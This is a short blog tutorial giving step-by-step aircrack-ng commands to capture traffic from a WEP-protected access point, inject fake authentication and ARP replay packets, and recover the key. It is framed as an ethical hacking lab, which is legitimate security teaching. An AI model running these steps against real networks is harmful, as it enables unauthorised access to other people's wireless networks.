top of page
Search

Cracking WEP

  • Parag shimpi
  • Aug 30, 2019
  • 1 min read

WEP

--> Wired Equivalent Privacy

--> Uses RC4 (Rivest Cipher 4) and Pre-Shared Key (contains hexadecimal digits)



Deliverable:


Lab Set up

Attacker’s System: Kali Linux

Target : Access Point or Router with WEP security


In Kali Linux --> Terminal



1. To put wlan0 on monitor mode

~# airmon-ng start wlan0


Here, wlan0 --> wireless interface



2. To check available access points

~# airodump-ng mon0


Here, mon0 --> interface for monitor mode


Note down BSSID, Channel number, etc.



3. To capture all the traffic of target access point

~# airodump-ng -c [channel number] --bssid [MAC address of access point] -w [filename] mon0


Here, -c --> channel

[chaneel number] à channel number used by access point

--bssid --> Basic Service Set Identification (MAC address of router)

-w --> write to file

[filename] --> name of the file to capture the traffic (capture file)

mon0 --> interface for monitor mode



4. In other terminal à we will do fake authentication

~# aireplay-ng -1 0 -a [MAC address of access point] mon0


Here, -1 --> attack mode used for fake authentication

0 --> delay retransmission time

-a --> BSSID of target (MAC address of router)

mon0 --> interface for monitor mode



5. To speed up data after association, we can use

~# aireplay-ng -3 -b [MAC address of access point] mon0


Here, -3 --> attack mode for ARP request replay attack

-b --> BSSID of target (MAC address of router)



6. In previous terminal --> When Data reaches 50,000 to 250,000 we can stop it. Now a capture file should be created in root directory.



7. Now you can crack the key

~# aircrack-ng [filename-01.cap]




 
 
 

Recent Posts

See All
Introduction to Ethical Hacking

Due to explosive growth of internet, we are living in the age where everything is connected to each other. Many systems like E-commerce...

 
 
 
Penetration Testing

Hacking is a prominent aspect in cyber space. It has two sides, good as well as bad. The system can be best protected by probing it,...

 
 
 

 © InfoSec Tutorials by Parag Shimpi 2019

  • Facebook Clean Grey
  • Twitter Clean Grey
  • LinkedIn Clean Grey
bottom of page